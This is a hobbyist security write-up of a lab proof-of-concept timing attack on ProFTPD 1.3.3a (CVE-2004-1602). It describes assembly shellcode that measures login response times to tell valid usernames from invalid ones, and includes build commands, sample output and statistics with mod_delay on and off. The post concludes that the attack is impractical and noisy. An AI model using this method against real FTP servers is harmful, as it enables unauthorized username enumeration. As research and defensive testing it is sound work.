FTP (ProFTPD) TIMING ATTACK LINUX X86_64 ASSEMBLY

FTP (ProFTPD) TIMING ATTACK LINUX X86_64 ASSEMBLY

This all started off with a discussion on whether it was feasible to exploit a XSS/CSRF combo to force the download of a page that could perform an HTTP timing attack. it was a long and heated discussion, but my main points were that 1) if i could make you download something it would probably be a bit more useful than an HTTP timing attack, and 2) that Javascript was too imprecise for such an attack, having just about 15 ms precision, which for most timing attacks would be way too large.

Nevertheless, this did made me think about timing attacks, overall. and as i am working through assembly linux x86_64 system calls, anyway, why not do something useful and try a PoC with potentially useable shellcode to see how feasible such an attack would be?

-------------------------------

so, let's define a PoC:

i'll ignore finding an injectable vulnerability to exploit for the shellcode. if i build shellcode directly in assembly, i can keep the binary small, and figure out what sort of size we'll talk about for injection. the smaller it is, the more places it can go. moreover, we have access to the real-time clock, which is nanosecond based, as precise as we can go. i'll use x86_64 linux, which is probably not too realistic for a client-side/browser injection, but it's what I have and what i am playing with. it'll do. the same process should be equivalent for other platforms.

then, we need a target that is know to have a timing attack vulnerability, and doesn't make coding the assembly or set-up too much of a hassle. from the config of a debian32 VM recently, i remember seeing a configuration for delay, which is perfect for this PoC, so that's what I settled on.

ProFTPD 1.3.3a - up to date debian 32-bit

CVE-2004-1602: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1602

basically, the vulnerability is this: if a valid user tries to login, before the password is requested, the FTPD already switches to the user's home directory. if the user is invalid, it doesn't do that, but still asks for the password, just as with a regular user. this creates a very slight timing difference that can be measured and compared.

this issue was discovered years ago and the fix was mod_delay. this adds a bit of extra time based on past time differences, in order to hide the time difference. in ProFTPD 1.3.3a this is turned on by default but can be turned off in the config file. so, perfect for our use, as we can test with mod_delay on and off, and a clear text protocol should not be so hard.

---------------------------------

FILES:

* ftp_timing.asm: 	http://pastebin.com/G7sj5aj6
* parse-timing-file.py: http://pastebin.com/X1Zamzq3

---------------------------------

ftp_timing.asm contains the assembly code for nasm (intel format). to skilled assembly coders it is probably crappy, but it works. This version has been (largely but not completely) de-nulled, but has in the comment before it the original code. the de-nulling is primarily through classic register name tricks and was mostly done to reduce the size of the shellcode. code labels and occasional comments hopefully helps navigate it.

it start with a bunch of assigns for easy reference, and two string variables as set up ("USER makhno" and "USER 0xACAB"), the first a valid login, the second invalid. then a place to put the server response and a place to store its length.

The code does the following:

1. set privileges as high as we can, just because
2. open a socket
3. flip r8 to determine whether to send a valid or invalid login. This will flip each loop
4. store socketfd. will be at rbp-0x8 throughout for reference
5. connect to 192.168.1.8:21 - set r9 to 0 for 'first read' (see below)
6. read the response so we get the banner
7. write out the response. I am printing to STDOUT
8. sleep 1 second

Now, we get the critical part of what needs to be measured:

9. get the start time
	a. set up some memory on the stack to store sec/nanosec structure
	b. get the real-time clock
	c. set pointer to space on the stack
	d. syscall
10. jump to tcpsend:
	a. flip r9 to 1 to show that this is us sending the USER command. This will be used to control code flow when we reading the response
	b. check whether to send "USER makhno" or "USER 0xACAB" and set rsi with result
	c. syscall and jump to tcpread
11. read response
	a. set memory location and length
	b. check r9 to see whether we are in the response to USER command
	c. jump to get end time
12. get the end time (see 9, but at -0x10 offset)

So, at this point effectively our clock is stopped.

13. the secs/nanosecs time structure is in two separate addresses. subtract start secs and start nanosecs from end secs and end nanosecs
14. i am interested in nanoseconds: multiply seconds by 1e09 and add to nanosecs so we have one end result
15. convert from hex to decimal and make it a printable number by adding 0x30 to each byte
16. write out the nanosecond result and add a linefeed
17. we jumped over the write out of the FTP response to not affect the timing result. print it now
18. close the connection
19. sleep 1 second
20. loop up to open a new socket until ^C

-----------------------------------

commands:

nasm -f elf64 -o ftp_timing.o ftp_timing.asm
ld -o ftp_timing ftp_timing.o

you can inspect the opcodes with objdump:

objdump -D ftp_timing

------------------------------------

when coding this, i had an 'int 3' at the top in order to halt this properly in gdb. even then if just running gdb ftp_timing and run, it would just run without halting. if you want to step through the code, uncomment the int 3 near the top of the code and use this:

gdb
>target exec ftp_timing
>run

it should halt on the int 3

------------------------------------

~*~*~*~*~*~*~*~*~*~*~
TIME TO TEST THIS OUT
~*~*~*~*~*~*~*~*~*~*~

i will run this from my host x86_64 linux box. this hosts a debian 32-bit vm with ProFTPD 1.3.3a running. the machine has 5-6 regular users with home directories. the users are jailed to their home directories in the proftpd config file and no anonymous access is allowed (or root). the delay option is set to off.

i'm directing STDOUT to a file so we can use this later for analysis. the debian virtual machine runs a couple of services but no other requests were being made other than these FTP requests. the x86_64 host is accessed through SSH and runs also a few daemons, but nothing under any kind of load. network impact should be negligible

------------------------------------

NOTE: as i should have thought of before my initial tests, measuring often means influencing results, especially when you go down to nanosecond level. during coding/debugging i had been using tcpdump and ran that also during initial tests. i then found out that running tcpdump added about 30-50% of time to the responses!!! i was also using tail -f to check the file being written, but in the actual test didn't do that either in order to not influence any result.

to be fair, the writing itself shouldn't have any real influence, as it is done outside of the time measurement and before a 1 sec sleep.

-------------------------------------

fire it up:

./ftp_timing > <output file>

you should get something like this in your output file (or stdout if not re-directing to file):

220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
818773
331 Password required for 0xACAB
220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
891999
331 Password required for makhno
220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
732719
331 Password required for 0xACAB

to take good data for analysis, you need 1,000s of data points. since we wait 2 sec total for each loop, this takes a while. my test runs ran for about 3.5 hrs or so.

this is fast. 732719 nanosecs is just over 0.7 milliseconds. the longer result here is just under 0.9 milliseconds. it was good to go with nanosecond measurement or the lack of precision would make analysis really difficult.

when i ran this with mod_delay turned on, it looked like this:

220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
1465633
331 Password required for 0xACAB
220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
1520684
331 Password required for makhno
220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
1851724
331 Password required for 0xACAB
220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
1245182
331 Password required for makhno

as should be expected - after all, mod_delay adds a bit of time - these times are longer, but even then they range from 1.2 ms to 1.8 ms, only. not something you'd ever notice as a user.

to help with analysis, i wrote a little python script that parsed the outputfile into a csv file with one USER command on one line and a line number (see FILES ^ ). this way it is easy to import in excel.

here is my command for when mod_delay was turned on:

./parse-timing-file.py -i proftpd-timing-on.txt -o proftpd-timing-on.csv

the result will look like this:

4,220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8],1851724,331 Password required for 0xACAB
5,220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8],1245182,331 Password required for makhno

check the last line, which may not have the nanosecs and response, depending on when you killed ftp_timing with ^C

-------------------------------------

RESULTS AND ANALYSIS

my tests ran for about 3.5 hrs. for the test with mod_delay off i got just over 8,000 data points and 6,600 for on. in each result set, there were always 6-10 complete outliers where something went wrong and timed out or something, which i simply removed. from the rest, here are some basic statistics, assuming normal distribution:

mod_delay: off	|INVALID|	| VALID |
---------------------------------------
-2*std dev:		  642806	  632770
-1*std dev:		  706643	  704462
	mean:		  770480	  776154
+1*std dev:		  834317	  847847
+2*std dev:		  898154	  919539

   std dev:		   63837	   71692
difference:			 0	    5674

there is a difference, but it is very, very small. the difference between the averages is just 5-6 microseconds. std dev is a little larger as well with the VALID login, which is really mostly at the longer end, which suggests the timing difference exists.

i played with different chart options to see how easy it was to detect a timing difference, and it is there, but not really obvious (and certainly not in text format). also, it is not really a "normal" distribution, more a quick 'peak', followed by a long slope. considering a response can not come sooner than an absolute minimum, i decided to start bucketing the data points and count the number of occurrences below certain thresholds. to make it meaningful i used buckets of 12,500 nanosecs. finally, subtract the previous to then show the number of each bucket side-by-side:

		| INVALID |	|  VALID  |
-----------------------------------
<625,000	|	3		2
<637,500	|	9		5
<650,000	|	24		14
<662,500	|	47		29
<675,000	|	43		47
<687,000	|	39		45
<700,000	|	84		60
<712,500	|	129		117
<725,000	|	229		211
<737,500	|	480		333
<750,000	|	686		689
<762,500	|	727		778
<775,000	|	378		476
<787,500	|	171		177
<800,000	|	84		87
…

this will be enough to make the point. there is a small set that comes real quick with initially higher numbers in the INVALID column, with the VALID requests catching up. then, with the larger bulk coming in, INVALID takes a lead, with the VALID responses catching up at 750,000, while the INVALIDs are already tailing off. visually, it is as if the VALID user requests "follow" the INVALID ones.

so far so good. it looks like the difference is small, but detectable.

let's look at the counter-test: what happens when mod_delay is turned on:


mod_delay: on	|INVALID|	| VALID |
---------------------------------------
-2*std dev:		  880056	  887491
-1*std dev:		 1339527	 1342002
	mean:		 1798998	 1796513
+1*std dev:		 2258469	 2251025
+2*std dev:		 2717939	 2705536

   std dev:		  459471	  454511
difference:		    2484		 0

the response times are noticeably longer for both VALID and INVALID users. these stats are again misleading, because of the "sloping" in the longer responses, and there are no responses faster than 1,000,000 nanoseconds, whereas with mod_delay off virtually all responses comes in below that. what is more, the stretch of the data set is far longer. while mod_delay off gives all the most outlier responses < 850-875,000 nanosecs, less than 100,000 from the mean, with mod_delay on this only happens around <2,400,000, about 600,000 from the mean.

because of the response stretch, bucketing was done with 50,000 intervals, which gives a hint that a slightly faster response for INVALID users can still be detected, but to be conclusive this would require a lot more data points and tighter bucket intervals to verify. Interesting is that the smaller bump after the main hump seems to return here but more pronounced and stretched. what was a 2nd peak of about 20% of the main peak's height when mod_delay was off, is close to 50% (and goes on for longer) when mod_delay is on. in both peaks, there seems a slight suggestion still INVALID user responses still lead by a small amount. i will probably run a longer analysis some time in the future.

-----------------------------------------

CONCLUSIONS

i am not really any more convinced that this is a likely attack vector. before an initial de-nulling pass, the opcodes came to around 1030. after simple de-nulling, this came to around 630. that's not large, but it is not exactly small either, compared to a reverse shell, for instance. the code also doesn't include any 'report-back', yet. i can open another socket and feed its fd to write instead of STDOUT if we want to get the results real-time, but any more stealthy and delayed option would require a lot more opcodes (and work)

even if we got a place large enough to inject and run it, it is not exactly quiet. we need still a good number of data points because even when mod_delay is off the difference in mean is still substantially smaller than standard deviation, and even if we look at fastest responses we need easily 1-2,000 data points. with the current 1 sec sleeps, you get about 2,000 attempts per hour.

here i only use two user accounts, one known to be good, one known to be bad. if we want to use this for user enumeration, we may need to run for 100s of possible user names, far far more if we can't make educated guesses. we know we can run through about 25-50 possible user accounts _in_a_day, 100s could take weeks. and at the end, we won't have their logins, just confirmed that they are valid user accounts on that machine.

this also assumes that 1,000-2,000 data points is enough. if there is a busy network, responses will quickly get unreliable. if the server is busy, this will affect these millisecond response times. the more data points we need, the longer the timing attack will take.

and it's LOUD. i left proftpd logging levels to defaults, and my testing generated about 7.5MB worth of logs, 1.3MB alone since turning mod_delay on. running for days would grow them to GBs. moreover, the time connecting and ip address of the host that runs the attack is logged:

Feb 10 17:03:46 debby proftpd[32445] debby (::ffff:192.168.1.7[::ffff:192.168.1.7]): FTP session opened.
Feb 10 17:03:47 debby proftpd[32445] debby (::ffff:192.168.1.7[::ffff:192.168.1.7]): FTP session closed.

(192.168.1.7 is the host)

of course, to speed up the logon attempts, you can sleep for less time, but that will make the attack only louder, and fill logs even faster. not my idea of stealthy. we can't even clean up the logs when the attack is successful!

so, while this was a fun exercise under practically ideal conditions, and leaves me with a tool to test the same timing attack against other FTP servers (it uses standard FTP protocol and is not unique to ProFTPD) as well as whether mod_delay can be defeated, i doubt that this kind of timing attack is particularly useful or likely to be encountered in the wild.